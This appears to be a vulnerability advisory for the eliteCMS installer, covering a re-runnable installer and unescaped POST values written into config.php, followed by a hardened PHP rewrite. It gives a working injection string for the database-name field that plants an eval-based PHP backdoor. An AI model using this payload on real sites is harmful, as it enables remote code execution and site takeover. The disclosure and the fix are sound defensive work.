eliteCMS's installer is not locked after installation completes, so an attacker can revisit the installer URL and run the installation again.

A second vulnerability: the installer can be made to write a one-line PHP backdoor directly into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated into PHP source without any escaping.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the POST request without any validation.
If the database name POST field is set to:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php.
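The following is an added example of how the step-4 config writer could be hardened; it is not eliteCMS code. It addresses both problems described above: it refuses to run once an install lock exists, and it validates the database settings and emits them with var_export() instead of pasting raw input between double quotes. The lock-file path, the helper function names, and the use of mysqli in the generated file are assumptions of this example.

```php
<?php
// Added example (not eliteCMS code): a hardened installer step 4.
// Assumptions: install.lock lives next to the installer, and the
// generated config uses mysqli instead of the deprecated mysql_* calls.

define('INSTALL_LOCK', __DIR__ . '/install.lock');               // assumed
define('CONFIG_FILE',  __DIR__ . '/../admin/includes/config.php');

// Problem 1: the installer must not be re-runnable after installation.
function assertNotInstalled(): void {
    if (file_exists(INSTALL_LOCK)) {
        http_response_code(403);
        exit('Installation already completed. Remove the install directory.');
    }
}

// Problem 2: accept only the characters a hostname, database name or user
// name legitimately needs. Quotes, '?', '<', '>' and whitespace are rejected,
// so a value like "?><?php ... can never reach the generated file.
function validateIdentifier(string $value, int $maxLen = 64): string {
    if ($value === '' || strlen($value) > $maxLen
        || !preg_match('/^[A-Za-z0-9_.:\-]+$/', $value)) {
        throw new InvalidArgumentException('Invalid database setting');
    }
    return $value;
}

// Build config.php with var_export(), which emits a correctly quoted and
// escaped PHP string literal for each value.
function buildConfig(array $db): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export($db[$key], true));
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out;
}

function writeConfig(array $post): void {
    assertNotInstalled();
    $db = [
        'DB_SERVER' => validateIdentifier($post['DB_SERVER'] ?? ''),
        'DB_NAME'   => validateIdentifier($post['DB_NAME'] ?? ''),
        'DB_USER'   => validateIdentifier($post['DB_USER'] ?? ''),
        // A password may legitimately contain any character; var_export()
        // escapes it, and the length cap keeps the generated file bounded.
        'DB_PASS'   => substr((string)($post['DB_PASS'] ?? ''), 0, 128),
    ];
    // Write to a temp file and rename so a half-written config is never live,
    // then create the lock so this step cannot be run a second time.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, buildConfig($db), LOCK_EX) === false
        || !rename($tmp, CONFIG_FILE)) {
        throw new RuntimeException('Could not write config file');
    }
    file_put_contents(INSTALL_LOCK, date('c') . "\n");
}

if (($_GET['step'] ?? '') === '4' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    writeConfig($_POST);
}
```

With this version, the payload shown above is rejected by validateIdentifier() before anything is written, and even the unconstrained password field is emitted as an escaped literal rather than raw source text. The lock check also gives operators a simple audit point: a missing install.lock on a deployed site, or an install directory still reachable over HTTP, is the condition that made the original re-installation problem exploitable.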